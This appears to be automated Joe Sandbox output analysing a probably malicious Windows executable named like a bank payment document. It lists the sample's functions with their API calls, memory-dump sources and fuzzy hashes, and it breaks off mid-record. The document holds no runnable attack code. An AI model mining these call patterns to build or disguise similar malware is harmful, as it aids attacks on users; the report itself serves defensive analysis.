                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2267087916-0
                                                                                                                                • Opcode ID: b6655b126bc8cedfd7516fbd32d5d6d7ab21873126599d2985f90328dee71438
                                                                                                                                • Instruction ID: 0c1a5b281b8e802f0220ccb9e843826373e365ba04d7a2164ccd04d9938284b7
                                                                                                                                • Opcode Fuzzy Hash: b6655b126bc8cedfd7516fbd32d5d6d7ab21873126599d2985f90328dee71438
                                                                                                                                • Instruction Fuzzy Hash: 4D21B174148201CF8314EF28D8858AA7BE8FE56764F108A2EF499C72A1D7399E46CB43
                                                                                                                                APIs
                                                                                                                                • _free.LIBCMT ref: 00755101
                                                                                                                                  • Part of subcall function 0074571C: __FF_MSGBANNER.LIBCMT ref: 00745733
                                                                                                                                  • Part of subcall function 0074571C: __NMSG_WRITE.LIBCMT ref: 0074573A
                                                                                                                                  • Part of subcall function 0074571C: RtlAllocateHeap.NTDLL(01180000,00000000,00000001,00000000,?,?,?,00740DD3,?), ref: 0074575F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap_free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 614378929-0
                                                                                                                                • Opcode ID: a021debab228e68a020f7295427b1d8e73fe7c9db1dffae71b4536c3b75acf60
                                                                                                                                • Instruction ID: cf3e435773e66418075bf2b48da38749d599ecb0278fd02f4e33606b4808a369
                                                                                                                                • Opcode Fuzzy Hash: a021debab228e68a020f7295427b1d8e73fe7c9db1dffae71b4536c3b75acf60
                                                                                                                                • Instruction Fuzzy Hash: BA11C1B2900E19EFCB213FB4AC5D79D3B989B053A2B204529FD489A151DFBC88449B95
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 007244CF
                                                                                                                                  • Part of subcall function 0072407C: _memset.LIBCMT ref: 007240FC
                                                                                                                                  • Part of subcall function 0072407C: _wcscpy.LIBCMT ref: 00724150
                                                                                                                                  • Part of subcall function 0072407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00724160
                                                                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 00724524
                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00724533
                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0075D4B9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1378193009-0
                                                                                                                                • Opcode ID: 6e0d85b9ab943307591a58570d667e571f8df8e26ada234b2dae80389db3f1a6
                                                                                                                                • Instruction ID: 25c94dad73a26dfeca88ba057cf13b017394d6807bf03627e2b45da7bbab6b1f
                                                                                                                                • Opcode Fuzzy Hash: 6e0d85b9ab943307591a58570d667e571f8df8e26ada234b2dae80389db3f1a6
                                                                                                                                • Instruction Fuzzy Hash: 6E21F5709047D4AFE732CB249845BE6BBECAB05309F04009DEBCA9A141C7B82D88CB45
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00725A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00787896,?,?,00000000), ref: 00725A2C
                                                                                                                                  • Part of subcall function 00725A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00787896,?,?,00000000,?,?), ref: 00725A50
                                                                                                                                • gethostbyname.WSOCK32(?,?,?), ref: 00796399
                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 007963A4
                                                                                                                                • _memmove.LIBCMT ref: 007963D1
                                                                                                                                • inet_ntoa.WSOCK32(?), ref: 007963DC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1504782959-0
                                                                                                                                • Opcode ID: a983a9d54f5c7a62849a58f2679c830e9b611c521c0c230a9fc989506bc463a6
                                                                                                                                • Instruction ID: a888b0a04b7a0c0de26c8bc104d52d58edcb083ffc71ef8d920a83c8b3d20dbc
                                                                                                                                • Opcode Fuzzy Hash: a983a9d54f5c7a62849a58f2679c830e9b611c521c0c230a9fc989506bc463a6
                                                                                                                                • Instruction Fuzzy Hash: 1B116072500119EFCF04FBA4ED4ACEEB7B9EF45310B148165F505A7161DB38AE14DB61
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00778B61
                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00778B73
                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00778B89
                                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00778BA4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 46a741c296a5de4e4826ceaac7bef05eabb832665e5e7e1891f312cda248bd3d
                                                                                                                                • Instruction ID: ebb713f5ad28c550eba2e6fb6b2a6b3e73670139ef56296d049ad2e58dc27a24
                                                                                                                                • Opcode Fuzzy Hash: 46a741c296a5de4e4826ceaac7bef05eabb832665e5e7e1891f312cda248bd3d
                                                                                                                                • Instruction Fuzzy Hash: 2D113AB9940218FFDF11DB95C884EADBB74EB48350F204095E904B7250DA716E10DB94
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623
                                                                                                                                • DefDlgProcW.USER32(?,00000020,?), ref: 007212D8
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0075B5FB
                                                                                                                                • GetCursorPos.USER32(?), ref: 0075B605
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0075B610
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4127811313-0
                                                                                                                                • Opcode ID: e7a8e43358dc2310a638dacd3319aa37be094f13544eae2c615955280b83f594
                                                                                                                                • Instruction ID: 8231bf4710c4cd68095b2f45fe71ab86062506a92f8041dab4f5be6366aa576e
                                                                                                                                • Opcode Fuzzy Hash: e7a8e43358dc2310a638dacd3319aa37be094f13544eae2c615955280b83f594
                                                                                                                                • Instruction Fuzzy Hash: BA112B35A00069EFCB10DF94E8899EE77F8FB56301F504455F901E7141D738BA51CBA9
                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0077D84D
                                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0077D864
                                                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0077D879
                                                                                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0077D897
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1352324309-0
                                                                                                                                • Opcode ID: c49c40bc01684d6d54dfe6bd15214d5f9246e8bdc3f6d5e191233881b1587561
                                                                                                                                • Instruction ID: 27b4e23d7d69c34c0155e08c7a1f982425047be7f9f129c1427ac98a3ff020ce
                                                                                                                                • Opcode Fuzzy Hash: c49c40bc01684d6d54dfe6bd15214d5f9246e8bdc3f6d5e191233881b1587561
                                                                                                                                • Instruction Fuzzy Hash: C411A1B5605304DBEB308F90DC08F93BBBCEF44B50F10C569E51AC6040D7B8E9089BA2
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3016257755-0
                                                                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                • Instruction ID: 4dc8c512a39e9760f9ac9e9f12b33c549085bb7f9e0fa38d3aebce467a09eaf2
                                                                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                • Instruction Fuzzy Hash: 63014B7244814EBBCF1A5E84EC05CEE3FA6BB18352B588415FE1859071D27AC9B9EB81
                                                                                                                                APIs
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 007AB2E4
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 007AB2FC
                                                                                                                                • ScreenToClient.USER32(?,?), ref: 007AB320
                                                                                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007AB33B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 357397906-0
                                                                                                                                • Opcode ID: ea7305400be4abb7e9ddc8f78c2b543a644bb1aaa83bf33be0091849ea15fd94
                                                                                                                                • Instruction ID: 7e1d865055a4d2833ef428c382ab186c9ccb645dbfbfa3a1ff5fc1c64da4ae81
                                                                                                                                • Opcode Fuzzy Hash: ea7305400be4abb7e9ddc8f78c2b543a644bb1aaa83bf33be0091849ea15fd94
                                                                                                                                • Instruction Fuzzy Hash: 781144B9D00209EFDB41CFA9C8849EEBBF9FF49311F108166E914E3220D735AA559F94
                                                                                                                                APIs
                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00786BE6
                                                                                                                                  • Part of subcall function 007876C4: _memset.LIBCMT ref: 007876F9
                                                                                                                                • _memmove.LIBCMT ref: 00786C09
                                                                                                                                • _memset.LIBCMT ref: 00786C16
                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00786C26
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 48991266-0
                                                                                                                                • Opcode ID: 786b932ef59e2d4ed366a673bafccdd196135f55814c89e61420cc23bacf03c1
                                                                                                                                • Instruction ID: 5b01cb9efa15269a640cb0d6cc77521a7ed2dec35880c20c771131301de47ba7
                                                                                                                                • Opcode Fuzzy Hash: 786b932ef59e2d4ed366a673bafccdd196135f55814c89e61420cc23bacf03c1
                                                                                                                                • Instruction Fuzzy Hash: E9F0543A200100BBCF456F95DC89A4ABB29EF85320F04C061FE085E267D735E811CBB5
                                                                                                                                APIs
                                                                                                                                • GetSysColor.USER32(00000008), ref: 00722231
                                                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 0072223B
                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00722250
                                                                                                                                • GetStockObject.GDI32(00000005), ref: 00722258
                                                                                                                                • GetWindowDC.USER32(?,00000000), ref: 0075BE83
                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0075BE90
                                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0075BEA9
                                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0075BEC2
                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0075BEE2
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0075BEED
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1946975507-0
                                                                                                                                • Opcode ID: abe6bdae7b89eb52b6021bceb0f2657bb845f18281f50bf26641c50c7fb630f0
                                                                                                                                • Instruction ID: 01d34c2250fcbec51e53fe221bd4f0dc76095576369e95aa1bb90028595faeab
                                                                                                                                • Opcode Fuzzy Hash: abe6bdae7b89eb52b6021bceb0f2657bb845f18281f50bf26641c50c7fb630f0
                                                                                                                                • Instruction Fuzzy Hash: 48E06D32504248EADF215FA4FC0D7E83F10EB46332F14C376FA69880E187BA4994DB26
                                                                                                                                APIs
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0077871B
                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,007782E6), ref: 00778722
                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007782E6), ref: 0077872F
                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,007782E6), ref: 00778736
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3974789173-0
                                                                                                                                • Opcode ID: 2b9291216053feac05d719409a7dcc5dc20c30b182253f614b77ecd2e1207be3
                                                                                                                                • Instruction ID: 85752b35b67b10afb79cd3d844c2714915a7d2b4445b1687cdf9a9e3a6d9c88e
                                                                                                                                • Opcode Fuzzy Hash: 2b9291216053feac05d719409a7dcc5dc20c30b182253f614b77ecd2e1207be3
                                                                                                                                • Instruction Fuzzy Hash: B8E086366512119BDB605FF09D0CB973BACEF927D1F14C828F24AC9080DA3C8441C755
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: %{
                                                                                                                                • API String ID: 0-3407211727
                                                                                                                                • Opcode ID: 33dbf10cf7f722235058f2eb34ff70b5f0921cc154876f4fdde7d0978606d6ef
                                                                                                                                • Instruction ID: 86edab6cf3415980c3ecb31ab357124d880ce98c0d94075b4a8629e09aff8add
                                                                                                                                • Opcode Fuzzy Hash: 33dbf10cf7f722235058f2eb34ff70b5f0921cc154876f4fdde7d0978606d6ef
                                                                                                                                • Instruction Fuzzy Hash: 4EB19E71900129DBCF24EF94E8859FEB7B5FF48310F104127E956A7292EB389E85CB91
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __itow_s
                                                                                                                                • String ID: xb~$xb~
                                                                                                                                • API String ID: 3653519197-3572622674
                                                                                                                                • Opcode ID: 63a495c68458c660a603b477a41ef86780ecd078ff736de10f195fd4e1ab3d7a
                                                                                                                                • Instruction ID: 25b23ce8065c51dc31e09d819f521719ce4633b7f78d6a09e0b08f4739e00020
                                                                                                                                • Opcode Fuzzy Hash: 63a495c68458c660a603b477a41ef86780ecd078ff736de10f195fd4e1ab3d7a
                                                                                                                                • Instruction Fuzzy Hash: 62B1A170A00109EFCF14DF54E995DBABBB9FF58310F148059FA459B291EB38E980CBA0
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0073FC86: _wcscpy.LIBCMT ref: 0073FCA9
                                                                                                                                  • Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
                                                                                                                                  • Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC
                                                                                                                                • __wcsnicmp.LIBCMT ref: 0078B02D
                                                                                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0078B0F6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                • String ID: LPT
                                                                                                                                • API String ID: 3222508074-1350329615
                                                                                                                                • Opcode ID: 314fdf92c4bc089daff2c26ec8c8006518dac629aff995559abf09672f2a8d5b
                                                                                                                                • Instruction ID: 7668334d3e4fc85e9733c317c670743cda6e9d882d3bd059e58ff8e40ebdee79
                                                                                                                                • Opcode Fuzzy Hash: 314fdf92c4bc089daff2c26ec8c8006518dac629aff995559abf09672f2a8d5b
                                                                                                                                • Instruction Fuzzy Hash: 3461C575E40218EFCB14EF94D899EAEB7B5EF09310F144069F916AB391D738AE40CB54
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00732968
                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00732981
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                                • Opcode ID: 2100af5003261345a812e330f66480f453a04838f925e08a55dd0677ccfbad6b
                                                                                                                                • Instruction ID: 871dfdeed2ddb26fd2fde58cebf8cd3984bacb4f8fca494479be5af6b86f3bd5
